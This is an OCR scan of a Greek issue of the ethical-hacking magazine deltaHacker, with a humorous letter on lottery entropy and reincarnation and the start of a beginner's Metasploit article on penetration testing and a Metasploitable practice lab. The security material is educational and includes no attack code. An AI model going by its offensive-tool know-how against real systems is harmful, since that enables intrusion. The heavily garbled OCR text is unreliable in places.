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και οδηγίες χρήσης 


Όχι και TO τόσο τυχαίες σκέψεις, 
σε όχι και τόσο τυχαία σειρά 


O Θεῖος Ακάκιος δεν κέρδισε ούτε φέτος το λαχείο κι 
αναρωτιέται γιατί, ενώ ταυτόχρονα προσπαθεί να καταλάβει 
πώς δουλεύει η µετενσάρκωση... 


Γιατί κάποιοι πίνουν νερό στ' ὄνομά της, ενώ ἄλλοι 
εύχονται να µην εἶχαν ακούσει ποτέ γι' αυτή; 


Τι ακριβώς είναι αυτό το δίκτυο, γιατί αξίζει να 
συμμετάσχετε κι εσείς και πώς θα το καταφέρετε 
--με το Arduino σας φυσικά! 


Δεν μιλάμε πλέον για εφαρμογές γραφικών μόνο, 
αλλά για εφαρμογές γραφικών που προορίζονται 
για σχεδίαση .. γραφικών ;) 


Τα αρµονικά κύματα είναι βαρετά. Av 
δεν ἔχει γρέζια η κυματομορφή, τότε κι 
ο ήχος εἶναι βαρετός... 


Στα πλαίσια της επιχείρησής µας για την κατανόηση 
των κακόβουλων προγραμμάτων, έφτασε η ώρα που 
πρέπει να τ' αφήσουμε να κάνουν τη δουλειά τους! 


O τίτλος τα AEE! όλα ;) 


To penetration testing lab εἶναι ἔτοιμο 
κι EEÍG έχουµε καταλάβει τι είναι και τι 
μπορεί να κάνει το Metasploit. Είναι wpa 
ν' αρχίσουμε και τις επιθέσεις. 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι έκδοσης Νίκος Μουρατίδης, Βούλα NauAidou 


Σύνταξη Παναγιώτης Βαρελὰς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιώργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Tóunpac 


Γραμματική επιμέλεια Βούλα NauAidou 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To περιοδικὀ deltaHacker εἶναι συνδροµητικὀ και εκδίδεται and την Parabing Creations 
δώδεκα φορές το χρόνο, κάθε μήνα. H Parabing Creations ἐχει την ἐδρα της στη Μαιώτιδος 
3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται and την ThessPrint Α.Ε. To 
email επικοινωνίας του περιοδικού εἶναι το talk2us@deltahacker.gr και ro email για τις 
συνδρομὲς ro subscriptions@deltahacker.gr. Οι πληροφορἱες για τις συνδρομὲς εἶναι στο 
http://deltahacker.gr/subscriptions και οι παραγγελίες γίνονται απὀ ro http://deltahacker. 
gr/order. Όλες οι απὀψεις που εκφράζονται στα άρθρα δεν εκφράζουν απαραίτητα και τη 
γνώµη του περιοδικού. 


(*) Μικρές ιστορίες για το m ενεργοποιούν κάποιους αναγνώστες µας 
και ξεκινάνε να υπολογίσουν όσα περισσότερα ψηφία μπορούν! 
Οι λεπτομέρειες στο http://deltahacker.gr/?p-7930 
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Πίνακας ελέγχου 


Τι ζητούν επιτέλους οι πρώτοι; Αρχείο δημοσιεύσεων 


Posted by subzraw | 10/02/2013, 00:29 | Published in mind Γενικό προφίλ 


Οι πρώτοι αριθμοί είναι αρκετά απλοί. Ακόμη και ένα μικρό παιδί Προφίλ στο forum. 
µπορεί να κατανοήσει τη φύση τους, αρκεί να γνωρίζει διαίρεση. Γιατί Αποσύνδεση 

τότε υπάρχουν προβλήματα γύρω από τοὺς πρώτους, mou 

ταλαιπωρούν τις μεγαλύτερες διάνοιες στο χώρο των μαθηματικών 

για περισσότερο απὀ έναν αιώνα τώρα: Τι δουλειά έχουν οι πρώτοι 

αριθμοί µε τον κβαντικό μικρόκοσμο; Πώς εμπλέκονται οι μιγαδικοί Q 
αριθμοί στην όλη ιστορία: 


ἱστορίεεγιατοπι Γίνε συνδρομητή 


Posted by 03/02/2013, 11:32 | Published in 


Είναι o πλέον δημοφιλής επισκέπτης and τη χώρα των μαθηματικών. 
Σε αντίθεση µε ἄλλα, βαριά και εχθρικά σύμβολα, το Πι είναι ιδιαίτερα. 
Φιλικό. Προσοχή, όµως: συχνά προκαλεί επικίνδυνες εμμονές! 
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Σπόνσορες 
τη arp 
Πόσο μικρός είναι o κόσμος; 
Ὅλοι ξέρουμε ὅτι o κόσμος έχει μικο 
Bav θα ἔμοιν dro, ὅτι αυτ 
μετά το δεύτερο μισό του 200 
που σημειώθηκε στοὺς τομ 
bouye φτάσει σήμερα 
δωδεκαριά ώρε. 


Είναι η ιστορία 


Ἄρθρα Απαντήσεις Θέματα 


subzraw στο deltaCast 501902 | Arch Linux 
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Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Ta εβδομαδιαΐα 
deltaCast. Τα προκλητικά mind hacks. Όλα τα βίντεο από τα live 
streams. Ολόκληρα blasts from the past. Τα πάντα ενδιαφέροντα 
fora. Το σημείο συνάντησης για τους φίλους του περιοδικού. 


deltahacker.gr 


Αληθινό, διασκεδαστικό hacker για όλους! 
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σνένλ. μένλ 


Αγαπητοί µου, 

Κατ' αρχάς, επιτρέφετέ µου να σας ενημερώσω από την αρχή OTL, παρᾶ 
τις περί του αντιθέτου προσδοκίες µας, δεν χερδίσαμε (ούτε) φέτος το 
πρωτοχρονιάτιμο. MU i 

΄ - 

θα θυμάστε, βέβαια, πώς έκλεισα την τελξνταία φορά κακήν κακώς την 
επιστολή µου γνατί μόλις κατέφτανε η εξαδέλφη µε την εφημερίδα των λα- 
χείων. 

E, λονπόν, τζύφος. Τίποτα. Οὐτε καν στον λήγοντα. 

Προσπαθώ πάλι να καταλάβω ποιο είναν το λάθος. 


Βέρω, ξέρω, θα µου πείτε Ott δεν υπάρχει πουθενά λάθος, το λαχείο εἰ- 
ναν θέμα τύχης, αν elvalt να κερδίσεις θα κερδίσεις. 


Δεν διαφωνώ, αλλά δε νομίζω OTL τελενώνει εκεί η ιστορία. 

Να εξηγηθώ. Όταν πάει κανείς να αγοράσει λαχείο δεν ποντάεν τους 
αριθμούς; Ίους κοντάεν. 

Ας πούμε, θα αγοράζατε ποτέ ένα λαχείο µε τον αριθµό IIIIII; Ύποπτο 
δεν φαίνεται; Σιγά µην κερδίσεν. Αποκλείεται. Οπότε δεν θα το αγοράζατε. 


H ίσως το 9870543 Όχι; Ναι; Ακούω γνώμες. To 3141593 To 271828; To 
141421: 

E θεωρία µου είναι πως αν καν ον αριθμοί που κερδίζουν σε ένα λαχείο 
ἡ pla λοττερία είναν, ὡς μεταβλητές, απολύτως τνχαίον, η «εντροπία» του 
καθενός παρουσιάζει κανονική κατανομή. 

Ονοµάζω, δε, εντροπία του αριθμού ενός λαχείου (ή ενός συνδυασμού στο 
λόττο), τον δείκτη εσωτερικής αταξίας του. Γνα παράδειγµα, το λαχείο µε 
αριθμό IIIIII έχει μικρότερη εντροπία από το λαχείο µε αριθµό, ξέρω 'yu, 
074657. 

To πρόβλημα το οποίο εδώ και χρόννα προσπαθώ να λύσω, λοιπόν, eva 
δυττό. 

Πρώτον, πώς ποσοτικοπονείταν ορθολογικά η εντροπία ενός λαχείου» 

Δεύτερον, πώς µπορεί να φτιαχτεί pla γεννήτρια ονονεί τυχαίων αριθμών 
(λαχείου) που να συμμορφώνονται σε δεδομένους εντροπιακούς περιορι- 
σμούς; (Γεννήτρνα, ὀχν φίλτρο.) 

Προσπαθούσα προ ημερών να ζέφω τον ανηφιό να ασχοληθεί µε το θέμα, 
µιας HAL η πρόσφατη συζήτησή µας, περί της σαιξπηρικής απενρομαϊμούς, 
μού αποκάλυφε το ενδιαφέρον του για την έννοια της τυχαιότητας. Με 
άκουσε µε προσοχή αλλά δεν τσίµπησε. H ἀποφή του ήταν OTL ακόµα Χαν Va 
φτιάχναμε PLA τέτουα γεννήτρια, γνα να έχουµε κάποια πιθανότητα να χερ- 
δίσουµε θα έπρεπε να αγοράζουμε κάθε φορά από ένα τσουβάλν λαχεία. Και 
OX’ µόνο το 074037, που τυχαίνει να έχεν υψηλή εντροπία. 

Πολύ φοβούμαι OTL EXEL κάποιο δίκιο. Αλλά δεν το βάζω κάτω. 


Πάντως, pLa που θυμήθηκα τα περί της μαϊμούς, ήθελα να σας γράφω πώς 
συνεχίστηκε η κουβέντα για την μαϊμού πον είχαμε την Πρωτοχρονιά. 
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θα θυμάστε για το πώς η μαϊμού µε την γραφομηχανή καν τον άπειρο 
χρόνο στη διάθεσή της θα καταλήξεν να έχει γράφειν όλα τα πράγματα που 
έχουν γραφτεί PEYPL τώρα, καθώς καν όσα πρόκειται να έχουν γραφτεί στο 
μέλλον. 


E Κυρία Καίτη είχε κάποιες διαφωνίες σχετικά µε το θέµα της ελεύθερης 
βούλησης: Αν στο λογοτεχνικό έργο της απειρομαϊμούς εμπεριέχεται το 
ἔργο κάθε μελλοντικού Σαίξπηρ, γνατί να κάτσει ο κάθε μελλοντικός Σαΐξ- 
πηρ να μάθεν να γράφει» 

Exel παρενέβην εγώ, γνα να τους πω πως αυτό που διαφοροποιεί τον 
Σαίξπηρ από την μαϊμούδα δεν εἶναι το λογοτεχνικό ταλέντο (του Σαίξπηρ) 
ή η υπομονή (της μαϊμούδας) αλλά το ότι ο Σαίξπηρ Χήθελεξ να γράφει τα 
έργα του ενώ η μαϊμούδα ὀχι. 

Την άλλη μέρα, πον λέτε, επανήλθε στο θέμα η μητέρα της εξαδέλφης, 
που είναν ννδουίστρνα. Το όλο ζήτημα, µας είπε, της θύμιζε τις ενδο- 
ινδοννστικές συζητήσεις για την μετενσάρχωση καν την ελεύθερη βούληση. 


Κατά την Μπάγκαβαντ Γχίτα, στόχος παν προορισμός της Φυχής είναι η 
πατάκτηση της τελειότητας καν η επανένωση µε τον Δημιουργό, δηλαδή τον 
θεό. Λυτό γίνεται pe την μετενσάρκωση. Κάθε φορά πον η Φυχή επιστρέφει 
στον υλικό κόσµο, φοράει ένα καινούργιο θνητό σαρκίο (xov ονομάζεται 
«τζίβα») xav ζεχνάεν την προέλευσή της. Σύμφωνα µε την Μπάγκαβατ Γχίτα, 
όλον εμείς ον ἄνθρωπον αλλά και κάθε, μα κάθε πλάσμα της Γης που ανα- 
πνέεν, δεν είµαστε παρά ᾠυχές ντυµένες µε το εφήμερο θνητό µας σαρκίο. 
Μηδενός εξαιρουμµένου. 

Ἐν αυτόν τον λόγο, άλλωστε, ον πραγματικά πιστοί Ινδουιστές είναν 
χορτοφάγοι: Μπορεί σήµερα va είσαν άνθρωπος, αλλά μεθαύριο µπορεί va 
είσαν κοτόπουλο. Δεν το ξέρεις. Δεν θα ήθελες να σε πιάσει ο άλλος καν να 
σου ανακόψει την πορεία προς την τελειότητα βάζοντάς σε στον φούρνο µε 
πατάτες. (Τώρα που το σκέφτομαι, TL φρονεῖ επ' αυτού η μητέρα της εξα- 
δέλφης όταν ετουµάζεν το ονομαστό της Κοτόπουλο Τζαλφρέζι (TM); Δεν την 
απασχολεί η μοίρα της Φυχής που ενοικούσε στο φτωχό το ζωντανό; Δια- 
κρίνω prav αντίφαση.) 

Ον Ινδονιστές, λοιπόν, πιστεύουν πως ο προορισμός όλων των ὠνχών είναν 
η τελειότητα καν η επανένωση µε τον θεό. Κάθε ὑυχή έρχεται στον μάταιο 
τούτο κόσμο όπου και δοκιµάζεταν. Μαζεύεν κάπονους «πόντους» ανάλογα 
µε τις επιδόσεις της, φεύγεν, και επανέρχεται για να δοκιμαστεί ξανά. Και 
ξανά. Και ξανά. Όλες, αναπόφευκτα, θα φτάσουν την τελειότητα. Απλά κά- 
MOLES θα χρειαστούν πιο πολύ χρόνο από O,TL κάποιες άλλες. 

To ερώτημα που προκύπτει αβίαστα είναν το εξής. Αφού ούτως ἡ άλλως 
θα φτάσουμε στην τελειότητα, yLatl να πανδευόµαστε να μαζεύουμε nÓ- 
ντους} Γιατί δεν χαλαρώνουμε αφήνοντας τα πράγματα να πάρουν τον δρό- 
po τους; Tv λίγο πιο πριν, τι λίγο πιο μετά. 
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Αγαπητοί pov, 

Νομίζω ότι έχετε διαβάσει αρκετές μον επιστολές ώστε να σας cival σα- 
PEG πού, κατά την γνώμη pov, βρίσκεται το λάθος στον παραπάνω συλλογν- 
σμό. Ας το σκεφτούμε λίγο. 

Ας υποθέσουμε OT) όλα τα δόγματα του Ἰνδουνσμού ισχύουν κατά γράμ- 
μα, καν ας εξετάσουμε ένα παράδειγµα. Ας φανταστούμε έναν άντρα µέσης 
ηλικίας που Cer καν ὁραστηριοπονείταν στην Αθήνα. Tov Κύριο Κώστα. 

O Κύρνος Κώστας είναν ένας άνθρωπος σαν όλους µας; αγαναντεί µε τους 
πολιτικούς πον πίνουν το αίμα του ποσµάκη, γλυκοκουτάει την κόρη του 
περιπτερά, παίρνει λεωφορείο, κλέβει την εφορία όποτε µπορεί, αγαπάει 
την γυναίκα του και σήμερα, Ir Φεβρουαρίου, απεργεί. 

Από Ἱνδονυνστικής πλευράς, «Κύριος Κώστας» δεν είναι παρά το όνοµα 
που εμείς ον άλλον άνθρωπον δίνουμε στο φθαρτό σαρκίο («τζίβα») που φι- 
λοξενεί σήμερα την συγκεκριμένη φυχή - µνα φυχή της οποίας, όπως είπαμε, 
το μέλλον διαγράφεται λαμπρό, καθώς αναπόφευκτα θα φτάσει στην τελειό- 
τητα καν θα επανενωθεί µε τον Λημιουργό της. 

To σηµείο στο οποίο πρέπει να επνκεντρώσουμε την προσοχή µας είναι 
αυτό του υποκειµένον. Πόσα υποκείµενα έχουµε εδώ, ένα ἡ δύο; 


H απάντηση είναι: δύο. 

To ένα είναν ο Κύριος Κώστας, ὡς καθηµερινός ἄνθρωπος υπεύθυνος των 
πράξεών TOV, µε τις επιθυμίες καν τα ελαττώματά του. To άλλο είναν ο «Κύ- 
ριος Κώστας» ως θνητό σαρκίο που φιλοξενεί pra ὠνχή µε (αναπόφευκτα) 
λαμπρό μέλλον. 

Παυτίζονταν το ένα υποκείµενο µε το άλλο; 


H απάντηση είναν ξεκάθαρη. Όχι. Δεν ταυτίζονταν. Είναι απολύτως δια- 
POPETLKG. 

Αυτό που μετενσαρκώνεταν δεν εἶναι ο Κύριος Κώστας αλλά η Quxr) που 
εμφανίστηκε κάπονα στυγµή στον κόσμο µας, έχοντας πάρεν την μορφή τον. 
Όταν, μοιραία, ο Κύριος Κώστας pac αφήσει χρόνους, civar η Φυχή του, 
καν OXL ο ίδιος, που θα πάρει τον δρόµο της καν θα µετενσαρμωθεί σε κάτι 
άλλο. Ενελπίστως όχν σε κοτόπουλο. 


Ev ολίγοις δεν είµαστε Χεμείς που θα φτάσουμε στην τελειότητα, αλλά 
η Φυχή που ενοικεί το θνητό µας σαρχίο. To λάθος στον παραπάνω συλλογι- 
σµό έγκειται στην αδυναμία διάκρισης μεταξύ των δύο αυτών υποκειμένων. 

Οφείλω φυσικά να επισημάνω OTL όλα αυτά τα γράφω ανεξαρτήτως του αν 
τα πιστεύω ἡ ὀχν. Αυτό εἶναι εκτός θέµατος. Εδώ απλώς υνοθετώ, uc υπό- 
θεση εργασίας, το ννδουιστικὀό δόγμα περί µετενσάρχωσης, KAL εξετάζω µια 
πλευρά του απὀ φιλοσοφικής/λογικής πλευράς. 

Καν µου φαίνεται πολύ ενδιαφέρον να βλέπω OTL καν στην Ινδουιστική θε- 
Ολογία γίνεται TO LLO ακριβώς λάθος µε αυτό που κάνουν τόσον και τόσον 
ερευνητές της τεχνητής νοημοσύνης ἡ μελετητές της ανθρώπινης ὑνχοπαθο- 
λογίας. 

Δεν καταφέρνουν να σκεφτούν σωστά γνα την υπόσταση των όρων καν των 
εννονών πον χρησιμοποιούν, καν αρχίζοντας να μιλούν yla ένα πράγµα κα- 
ταλήγουν να βγάζουν συμπεράσματα για κάποιο ἀλλο. Καν μάλιστα χωρίς va 
το καταλαβαίνουν, 


Άρμεγε και κούρενε, δηλαδή. 

Auta. Θα συνεχίσω. 
Σας ασπάζομαν 
θείος Ακάκιος 


deltall 


HA@KER 


Στη 2η χρονιά και συνεχίζουμε ακάθεκτοι! 


Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 
Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 


7 / 


€ twitter.com/deltaHacker 


f 


Always check rope 
E: fer spoilage 


Never place four hands here 


ἩΟΙΩΞΒΊ1ΘΙΙ 


front or bact 
Q 


jove 


fY 


{ο avoid sliclim 
Aiyo va παρακολουθεἰτε τα νέα ano το 
χώρο της ασφάλειας και σίγουρα θα ‘yETE 
ακούσει γι’ AUTÒ. Συχνά πυκνὰ, HE το nou 
ανακαλύπτεται και δημοσιεύεται κἄποια 
αδυναμία, ano κοντὰ ακολουθεί και TO 
αντίστοιχο module για ro Metasploit. Τι 
ακριβώς ὁμως εἶναι αυτὀ ro Metasploit; 
Γιατί κἄποιοι πίνουν νερὀ στ’ ὀνομά του, 
ενώ ἄλλοι εὐχονται να µην εἶχαν ακούσει 
velocity ποτὲ γι’ auto; Αξίζει να μάθετε va το 

δουλεύετε κι εσείς; Φυσικά κι αξίζει. 


-— » . x 
| Urn to INCrEASE 


by subZrau 
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Σε µια πρὠτη προσέγγιση, εἶναι ακριβὲς να πούμε ὁτι το Metasploit 
Framework ἡ απλά Metasploit αποτελεἰ µια πλατφόρμα Ανοικτού 
Λογισμικού, η onoia αφενὸς παρέχει µια εκτενἠ βάση δεδοµένων anó ex- 
ploits, αφετέρου επιτρέπει την ανάπτυξη νέων. Επιπρόσθετα, έρχεται και 
µε ra anapaitnta εργαλεία που διευκολύνουν σηµαντικά τις διαδικασίες 
TOU penetration testing και του post exploitation. 


To penetration testing εἶναι kári σαν το επιθετικὀ hacking των καλών. 
Αν, ónAaórj, εγὠ εἰμαι ἑνας penetration tester, πηγαίνω σε υποψήφιους 
πελάτες και τους λέω κάτι σαν auró: «Καλημέρα σας. Θέλετε va δοκιμάσω 
την ασφάλεια των συστημάτων και των δικτύων σας; Ό,τι καταφέρω, 
θα το καταγράψω αναλυτικἁ και θα σας το παρουσιάσω». Κάποιοι, εἶναι 
πολύ πιθανὀ να µου απαντήσουν επιφυλακτικά: «A, una; Και yiari να To 
κάνουμε αυτό;». H απἀντησή µου θα τους προβληματἰσει: «Μα, γιατὶ ό,τι 
μπορώ να πετύχω εγώ σἰγουρα μπορεὶ va το πετύχει κι ἑνας κακόβουλος 
επιτιθέμενος. Δεν θέλετε να γνωρίζετε απὀ πριν τι θα μπορούσε va 
καταφέρει αυτός ο κακούργος, ώστε να λάβετε απὀ ropa τα απαραἰτητα 
μέτρα προστασίας; E; Δεν θέλετε;». Αφού το σκεφτούν λίγο, apkeroi 
αποφασίζουν oT! θέλουν. Εξ ου λοιπὸν ra επαγγἐλµατα των penetration 
testers kai των ερευνητών ασφαλείας γενικὀτερα. 


To Metasploit εἶναι ἑνα ano τα εργαλεία που κάθε penetration tester έχει 
στο οπλοστάσιό του, ακόµη κι εκεῖνοι nou το σνομπάρουν. Βλέπετε, η εν 
λόγω πλατφόρμα διευκολύνει σηµαντικά τις επιχειρήσεις πρὀσβασης σε 
απομακρυσμένα συστήµατα ἡ και ολὀκληρα δίκτυα. Οἱ βετεράνοι χάκερ, 
λοιπὸν, εἶναι λογικὀ να αισθάνονται µια δυσφορία p’ αυτἠ την κατάσταση. 
Καταλαβαίνουν oT! αρκετοί, ειδικἁ νεότεροι σε ηλικία συνάδελφοί 
τους, δεν βάζουν καθόλου το μυαλὸ τους να δουλέψει και το μόνο που 
ξέρουν εἶναι να χειρίζονται ἄλλη uia εφαρμογἠ: ro Metasploit. Βέβαια η 
εφαρμογἠ αυτἠὴ δεν µπορεί να κάνει θαύματα, οπότε στις περιπτώσεις που 
αδυνατεί να προσφέρει ουσιαστική βοήθεια πολλοὶ σηκώνουν τα χέρια 
ψηλὰ και ra παρατάνε. Apa, λένε οι βετεράνοι χάκερ, ro Metasploit στην 
πραγματικότητα κάνει περισσότερο KAKO παρὰ καλὸ στουςνεοφερµένους: 
Τους αποθαρρύνει ano ro να χρησιμοποιούν τη φαντασία τους αλλά κι 
ano το να βάζουν το μυαλὸ τους να δουλέψει. Στην καλύτερη περίπτωση, 
σημειώνουν µε νόημα οι βετεράνοι, το Metasploit φτιάχνει τη λεγόμενη 
γενιὰ των «Metasploit hackers», οι onoioi εἶναι επικίνδυνα κοντὰ στους 
«lame hackers»! 


Δεν ακούγεται και πολύ ἀκυρη n συλλογιστικἠ των βετεράνων, μόνο που 
οι φίλοι µας συχνὰ αποτυγχάνουν να παρουσιάσουν τη συνολικἠ εικόνα. 
Ευτυχώς, τίποτε δεν µας εμποδίζει ano το va τη δούμε μόνοι µας. Κι av 
το κάνουμε, εὐκολα θα διαπιστώσουμε ὁτι γνωστοί, καταξιωμένοι hack- 
ers και penetration testers, δεν ἐχουν κανένα απολύτως πρόβλημα va 
χρησιμοποιούν ro Metasploit — και μάλιστα καθόλου δεν το κρύβουν! 
Ἴσως επειδἠ αναγνωρίζουν την αξία της πλατφόρμας αλλά ταυτόχρονα 
ξέρουν Ori δεν εἶναι το ἄλφα και το ὠμέγα. Επομένως, όταν To Metasploit 
δεν µπορεἰ να τους πάει πολύ μακρυά, τότε σίγουρα δεν διστάζουν 
να βάζουν το μυαλὸ τους να δουλέψει — και μάλιστα πέρα and την 
πεπατημένη. 


Αν υποθέσουμε τώρα OTI εδὠ έχουμε δύο αντιμαχόμενες πλευρές, η 
ταπεινὀτητἁ µας επιλέγει να πάει µε το μέρος των hackers nou *kai* 
TO Metasploit χρησιμοποιούν *kai* δεν ντρέπονται να το παραδεχτούν. 
Φιλοδοξούμε μάλιστα να γνωρἰσουμε και σ’ εσάς αυτἠ τη θαυμαστή 
πλατφόρμα, δεἰχνοντάς σας τι μπορεί και τι δεν μπορεἰὶ να κάνει. 


Metasploit: Ynepn^atgóppa επιθέσεων | 
Αα 


Και πριν προχωρήσουμε στο κύριο µέροςτης παρουσἰασἠς µας, να κάνουμε 
µια σημαντικἠ υποσημµείωση: Πα να µας ακολουθήσετε σ’ αυτὀ το ταξίδι 
στον κόσμο του penetration testing µέσω rou Metasploit, ιδιαίτερες ἡ/ 
και προχωρημένες γνώσεις *óev* απαιτούνται. H καλἠ διάθεση και η 
ὀρεξη για πειραματισμὀ εἶναι ὁ,τι θα χρειαστείτε. Ακριβώς ra ἰδια εφόδια 
παΐρνουμε κι εμεὶς μαζὶ µας, πάντα. 


Τα γάντια κι ο σάκος 


To Metasploit Framework (www.metasploit.com) μπορεὶ να λειτουργήσει 
σε περιβάλλον Linux, OS X ἡ Windows. Συχνὰ ωστόσο θα Seite να ro 
χρησιμοποιούν σε Linux και συγκεκριμένα μέσα απὸ τη διανομὴ του 
BackTrack (www.backtrack-linux.org). 


O καλύτερος τρὀπος για ν΄ αρχίσετε να εξοικειώνεστε µε την πλατφόρμα 
εἶναι να OTNOETE το δικὀ σας εικονικὀ εργαστήριο, µε τη βοήθεια µιας 
εφαρμογἠς virtualization ὁπως εἶναι ro VirtualBox (www.virtualbox.org), 


eo Penetration Testing Tool, Metasploit, Free Download | Rapid7 Pal 
σα πι (6) | R2. www.rapid7.com joroducts/metasploit /download.jsr C |. aesdec.) 


RAPID» Support / Blog / Community |Q | Free Tools ] 


866-7-RAPID7 / Contact / Login / Store 


NEXPOSE - METASPLOIT ~ MOBILISAFE ~ SOLUTIONS SERVICES COMPANY RESOURCES 


OVERVIEW EDITIONS ἃ FEATURES TECH SPECS DOWNLOAD METASPLOIT 


Penetration Testing Tool Download - Metasploit ^ g swe 
Free download of the world's leading penetration testing tool 


wwe 0) Eie 13) Qf share) * gj 


A collaboration of the open source community and Rapid7, Metasploit&, our signature penetration testing tool helps security and IT professionals 
identify security issues, verify vulnerability mitigations and manage expert-driven security assessments. 


Free penetration testing tool download 
Metasp loit (Metasploit Version 4.5.2) 


Windows Linux 64-Bit 


v DOWNLOAD NOW vy DOWNLOAD NOW 


A a Also available: Linux 32-bit 


Ano το φθινόπωρο Tou 2009 To Metasploit Framework (www.metasploit.com) 
αποτελεί ιδιοκτησία της Rapid7 (www.rapid7.com). Η εταιρεία ἐχει αναπτύξει 
διάφορα εμπορικά προϊόντα γύρω απ’ αυτό (Community, Express kai Pro), ωστόσο 
η βασική πλατφόρμα παραμένει ελεύθερα διαθέσιµη και διανέμεται δωρεάν UNO την 
> System Requirements άδεια BSD. To Metasploit µπορεί va εγκατασταθεί σε περιβάλλον Windows rj Linux. 
Χάρη στο MacPorts Project (www.macports.org), µπορεί va λειτουργήσει Kai κάτω 

ano OS X. Ίσως óuoc o καλύτερος τρόπος yia va εξοικειωθείτε μαζί του εἶναι µέσα 

anó το περιβάλλον του BackTrack Linux, σε φυσικό ἡ εικονικὀ υπολογιστή. 


Related Resources: 


> Documentation 
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το VMware Workstation (www.vmware.com/products/workstation/overview. 
html) ἡ ro VMware Fusion (www.vmware.com/products/fusion/overview. 
html). Πιο συγκεκριµένα, στο εικονικὀ δίκτυο θα υπάρχουν τουλάχιστον 
δύο virtual machines (VMs). To ἑνα 8a τρἐχει BackTrack Linux και δεν θα 
χρειαστεἰ καν ν΄ ασχοληθεἰτε µε την εγκατάσταση rou Metasploit, αφού 
µετά την εγκατάσταση του λειτουργικού εἶναι κι αυτό παρὀν. Το ἄλλο VM 
θα εἶναι To Metasploitable. Πρόκειται yia µια διανομή Linux που βασίζεται 
στο Ubuntu και σκοπίμως ἐχει ενεργοποιηµένες Eva σωρὀ ευπαθείς 
υπηρεσίες. Αν φανταστείτε ro Metasploit σαν τα γάντια του μποξ, τότε TO 
Metasploitable εἶναι o σάκος που θέλετε, ὥστε να µη Χτυπᾶτε O,TI να ‘val 
ἡ ὁποιους va ‘val (και βρείτε και TO µπελά σας). Προαιρετικά, στο εικονικὀ 
σας δίκτυο µπορείτε να στήσετε κι ἄλλα ΝΜ-στόχους (oàko! του μποξ), 
όπως, n.x., éva nou θα τρέχει Windows ΧΡ και θα "χει ενεργοποιηµμένες 
μερικὲς ευπαθεὶς υπηρεσίες. 


Στο 6ο επεισόδιο της inc σεζὀν rou deltaCast ἐχετε την ευκαιρία va 
παρακολουθήσετε ὀλες τις λεπτομέρειες για το στήσιμο του δικού σας 
εικονικού εργαστηρίου µε To BackTrack Linux, το Metasploitable κι ¿va 
ευπαθὲς VM µε Windows ΧΡ Service Pack 2. Το λογισμικὀ virtualization 
που χρησιμοποιείται για τις ανάγκες της παρουσἰασης εἶναι ro VirtualBox 
κι εργαζόµαστε σε περιβάλλον Windows 7 64bit (αυτό εἰναι To host OS, 
δηλαδή). Προφανώς, avri για ro VirtualBox εσεὶς κάλλιστα µπορείτε να 
δουλέψετε µε µια ἄλλη εφαρµογή, ὁπως, π.χ., το VMware Workstation ἡ 
το Fusion. Επίσης, το host OS µπορεί va ‘vai ro Linux ἡ το OS X. Όλα αυτά 
δεν ἐχουν σημασία yia την αποστολἠ µας, n οποία εἶναι να γνωρίσουμε TO 
Metasploit µέσα ano συγκεκριµένα παραδεϊγµατα κι επιθέσεις. 


Κάντε τώρα Eva διάλειμμα και παρακολουθήστε ro deltaCast 501606: 
http://deltahacker.gr/deltacast-s01e06 


Μετὰ σας περιμένουμε και πάλι εδώ, για την πρώτη µας γνωριμία µε TO 
Metasploit Framework! 


Απολύτως απαραΐτητοι 


Βασική προὐπόθεση για να καταλάβουμε οτιδήποτε, εἶναι να ἐχουμε 
συμφωνήσει στους ὁρους που χρησιμοποιούμε αλλά και στη σημασία 
που ἐχουν. Στην περίπτωση rou Metasploit Framework, οφείλουμε κατ΄ 
ελάχιστον να ξεκαθαρίσουµε τη σημασία των όρων exploit, payload, mod- 
ule και listener. Πιθανώς βέβαια va τους ἐχετε ακούσει ξανά --άλλωστε 
διαβάζετε Eva περιοδικὀ που λέγεται deltaHacker—, ενώ apkeroi anó εσὰς 
τους χρησιµοποιείτε στη δουλειὰ σας rj ἑστω σε συζητήσεις µε φίλους 
και συνεργάτες. Πιστεύουμε όμως OT! εἶναι σημαντικὀ να δούμε ξανὰ τη 
σημασία τους — ειδικἁ στα πλαἰσια της πλατφόρμας rou Metasploit. 


Exploit. Τα λειτουργικά συστήματα, oi υπηρεσίες και οι εφαρμογές δεν 
κατασκευάζονται ano θεούς αλλά ano ανθρώπους. Κανένας ἄνθρωπος 
δεν εἶναι τέλειος KI όλοι κάνουν λάθη. Τα λάθη αυτά αντικατοπτρἰζονται 
και στα κατασκευἀσματά τους, σαν αυτά που μόλις αναφέραμε. Ἕνας 
επιτιθέμενος (attacker) ψάχνει για τέτοια λάθη ἡ αλλιώς ευπάθειες (vul- 
nerabilities) σε λειτουργικἁ συστήματα, υπηρεσίες κι εφαρμογές. Στόχος 
του εἶναι να βρει όσα περισσότερα μπορεί και μετά να τα εκμεταλλευτεί 
κατάλληλα, προκειµένου να υποχρεώσει το λογισμικὀ σε συμπεριφορές 
nou o αρχικὸς δημιουργὸς (προγραμματιστής) οὐτε ixe προβλέψει, οὐτε 
φανταστεί. Με λίγα λόγια, ο attacker αναζητἁ διαρκώς τα λεγόμενα 
exploits, ώστε va τα εκμεταλλευτεί (exploitation) για τους δικούς του 


Metasploit: Υπερπλατφόρμα επιθέσεων | 
| 


eoo corei3pc 
N Application: 
* root@bt: ~ 
File Edit 
root@bt 


/ Metasploit! \ 


\ / 


4.6 api:1.0 
14 post 


Ano ro uakpuvó (;) 2003 nou To Metasploit ἦταν γραμμένο σε Perl, αποτελούσε 
το πρὀτζεκτ EVOG µόνο ανθρώπου και περιελάμβανε 11 μόλις exploits, έχουν 
συμβεί πάρα πολλά στην πλατφόρμα. Σήμερα, το Metasploit Framework ανήκει 
στη Rapid7, υπάρχει ολόκληρη ομάδα αφιερωμένη στην ανάπτυξη κι επἐκτασή 
